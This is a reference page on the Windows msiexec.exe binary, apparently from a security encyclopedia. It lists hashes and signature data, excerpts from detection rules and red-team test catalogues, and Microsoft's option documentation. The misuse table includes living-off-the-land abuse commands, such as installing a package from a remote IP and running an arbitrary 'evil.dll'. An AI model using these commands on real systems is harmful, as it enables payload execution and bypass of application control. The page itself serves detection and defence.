msiexec.exe

  • File Path: C:\Windows\SysWOW64\msiexec.exe
  • Description: Windows installer

Screenshot

msiexec.exe

Hashes

Type Hash
MD5 0BDEAEA7BB4AE7822416CD37EA8EE00D
SHA1 89A76EC5F7465D3ED350652511112131520F8E69
SHA256 5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA
SHA384 17C201C6F193EC939D2EAE943F431B183C0AEFE902139C6A06B46F289202CD3ED33B34BA0AFC293B88E986C1A0DBB913
SHA512 61184E002E58732E4C7617508F63E454D0E7959957D8AE218D55E0E4E5634C12F02C4D76B3D8ADCCAEF71ADDB804292FEAD0D4FB1FF04FA06C911E77122E34B1
SSDEEP 768:Y48sHQ8TB4LH7jCHURjutImIgcC6F/xHaJI8v5m6rugC5q6MLaody:YqTB4Lb9RjutoKpvLrLNV

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: msiexec.exe.mui
  • Product Name: Windows Installer - Unicode
  • Company Name: Microsoft Corporation
  • File Version: 5.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 5.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of msiexec.exe being misused. While msiexec.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\msiexec.exe' DRL 1.0
sigma win_firewall_as_add_rule.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\msiexec.exe' DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert DRL 1.0
sigma image_load_suspicious_vss_ps_load.yml - '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml title: Msiexec Initiated Connection DRL 1.0
sigma net_connection_win_msiexec.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma net_connection_win_msiexec.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma net_connection_win_msiexec.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma net_connection_win_msiexec.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml - Legitimate msiexec over networks DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_svchost_cred_dump.yml - '*\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml description: This rule looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml description: This rule looks for Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - CommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - ParentCommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_attrib_hiding_files.yml - msiexec.exe hiding desktop.ini DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml title: Suspicious Msiexec Execute Arbitrary DLL DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml title: Suspicious Msiexec Quiet Install DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*msiexec*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml ParentImage\|endswith: ':\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml CommandLine\|startswith: 'C:\Windows\syswow64\MsiExec.exe -Embedding' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml title: Suspicious MsiExec Directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml description: Detects suspicious msiexec process starts in an uncommon directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml title: MsiExec Web Install DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml description: Detects suspicious msiexec process starts with web addresses as parameter DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - ' msiexec' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\System32\MsiExec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\system32\msiexec.exe DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\syswow64\MsiExec.exe DRL 1.0
sigma registry_event_vbs_payload_stored.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml Image\|endswith: '\msiexec.exe' DRL 1.0
LOLBAS Msiexec.yml Name: Msiexec.exe  
LOLBAS Msiexec.yml - Command: msiexec /quiet /i cmd.msi  
LOLBAS Msiexec.yml - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png  
LOLBAS Msiexec.yml - Command: msiexec /y "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Command: msiexec /z "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Path: C:\Windows\System32\msiexec.exe  
LOLBAS Msiexec.yml - Path: C:\Windows\SysWOW64\msiexec.exe  
LOLBAS Msiexec.yml - IOC: msiexec.exe retrieving files from Internet  
LOLBAS Msiexec.yml - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/  
atomic-red-team index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Scheduled Task | Thread Execution Hijacking CONTRIBUTE A TEST | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Security Support Provider | Token Impersonation/Theft | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1047.md msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart MIT License. © 2018 Red Canary
atomic-red-team T1072.md msiexec /i “#{radmin_installer}” /qn MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md # T1218.007 - Msiexec MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md <blockquote>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /q /i “#{msi_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /y “#{dll_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1219.md Msiexec will be used to quietly insall ScreenConnect. MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /x $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /x #{msi_file_path} /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /i #{msi_file_path} /qn MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar Not shared publicly: rules for CobaltStrike loader samples, ISOs, specifc msiexec method found in some samples CC BY-NC 4.0
signature-base apt_blackenergy.yar $s2 = “msiexec.exe” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s2 = “%s\msiexec.exe %d %d” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s4 = “%s\msiexec.exe UAC” fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $x1 = “msiexec /f c:\users\%username%\downloads\” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = “Full path: C:\Windows\system32\msiexec.exe /V” fullword wide CC BY-NC 4.0
stockpile 60f63260-39bb-4136-87a0-b6c2dca799fc.yml Start-Process msiexec.exe -ArgumentList "/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1" -Wait; Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


msiexec

Provides the means to install, modify, and perform operations on Windows Installer from the command line.

Install options

Set the install type for launching an installation package.

Syntax

msiexec.exe [/i][/a][/j{u|m|/g|/t}][/x] <path_to_package>
Parameters
Parameter Description
/i Specifies normal installation.
/a Specifies administrative installation.
/ju Advertise the product to the current user.
/jm Advertise the product to all users.
/j/g Specifies the language identifier used by the advertised package.
/j/t Applies transform to the advertised package.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
Examples

To install a package named example.msi from the C: drive, using a normal installation process, type:

msiexec.exe /i "C:\example.msi"

Display options

You can configure what a user sees during the installation process, based on your target environment. For example, if you’re distributing a package to all clients for manual installation, there should be a full UI. However, if you’re deploying a package using Group Policy, which requires no user interaction, there should be no UI involved.

Syntax

msiexec.exe /i <path_to_package> [/quiet][/passive][/q{n|b|r|f}]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/quiet Specifies quiet mode, which means there’s no user interaction required.
/passive Specifies unattended mode, which means the installation only shows a progress bar.
/qn Specifies there’s no UI during the installation process.
/qn+ Specifies there’s no UI during the installation process, except for a final dialog box at the end.
/qb Specifies there’s a basic UI during the installation process.
/qb+ Specifies there’s a basic UI during the installation process, including a final dialog box at the end.
/qr Specifies a reduced UI experience during the installation process.
/qf Specifies a full UI experience during the installation process.
Remarks
  • The modal box isn’t shown if the installation is cancelled by the user. You can use qb+! or qb!+ to hide the CANCEL button.
Examples

To install package C:\example.msi, using a normal installation process and no UI, type:

msiexec.exe /i "C:\example.msi" /qn

Restart options

If your installation package overwrites files or attempts to change files that are in use, a reboot might be required before the installation completes.

Syntax

msiexec.exe /i <path_to_package> [/norestart][/promptrestart][/forcerestart]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/norestart Stops the device from restarting after the installation completes.
/promptrestart Prompts the user if a reboot is required.
/forcerestart Restarts the device after the installation completes.
Examples

To install package C:\example.msi, using a normal installation process with no reboot at the end, type:

msiexec.exe /i "C:\example.msi" /norestart

Logging options

If you need to debug your installation package, you can set the parameters to create a log file with specific information.

Syntax

msiexec.exe [/i][/x] <path_to_package> [/L{i|w|e|a|r|u|c|m|o|p|v|x+|!|*}] <path_to_log>
Parameters
Parameter Description
/i Specifies normal installation.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
/li Turns on logging and includes status messages in the output log file.
/lw Turns on logging and includes non-fatal warnings in the output log file.
/le Turns on logging and includes all error messages in the output log file.
/la Turns on logging and includes information about when an action started in the output log file.
/lr Turns on logging and includes action-specific records in the output log file.
/lu Turns on logging and includes user request information in the output log file.
/lc Turns on logging and includes the initial UI parameters in the output log file.
/lm Turns on logging and includes out-of-memory or fatal exit information in the output log file.
/lo Turns on logging and includes out-of-disk-space messages in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lv Turns on logging and includes verbose output in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lx Turns on logging and includes extra debugging information in the output log file.
/l+ Turns on logging and appends the information to an existing log file.
/l! Turns on logging and flushes each line to the log file.
/l* Turns on logging and logs all information, except verbose information (/lv) or extra debugging information (/lx).
<path_to_logfile> Specifies the location and name for the output log file.
Examples

To install package C:\example.msi, using a normal installation process with all logging information provided, including verbose output, and storing the output log file at C:\package.log, type:

msiexec.exe /i "C:\example.msi" /L*V "C:\package.log"

Update options

You can apply or remove updates using an installation package.

Syntax

msiexec.exe [/p][/update][/uninstall[/package<product_code_of_package>]] <path_to_package>
Parameters
Parameter Description
/p Installs a patch. If you’re installing silently, you must also set the REINSTALLMODE property to ecmus and REINSTALL to ALL. Otherwise, the patch only updates the MSI cached on the target device.
/update Install patches option. If you’re applying multiple updates, you must separate them using a semi-colon (;).
/package Installs or configures a product.
Examples
msiexec.exe /p "C:\MyPatch.msp"
msiexec.exe /p "C:\MyPatch.msp" /qb REINSTALLMODE="ecmus" REINSTALL="ALL"
msiexec.exe /update "C:\MyPatch.msp"
msiexec.exe /uninstall {1BCBF52C-CD1B-454D-AEF7-852F73967318} /package {AAD3D77A-7476-469F-ADF4-04424124E91D}

Where the first GUID is the patch GUID, and the second one is the MSI product code to which the patch was applied.

Repair options

You can use this command to repair an installed package.

Syntax

msiexec.exe [/f{p|o|e|d|c|a|u|m|s|v}] <product_code>
Parameters
Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if file is missing, or if an equal or older version is installed.
/fd Repairs the package if file is missing, or if a different version is installed.
/fc Repairs the package if file is missing, or if checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.
Examples

To force all files to be reinstalled based on the MSI product code to be repaired, {AAD3D77A-7476-469F-ADF4-04424124E91D}, type:

msiexec.exe /fa {AAD3D77A-7476-469F-ADF4-04424124E91D}

Set public properties

You can set public properties through this command. For information about the available properties and how to set them, see Public Properties.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.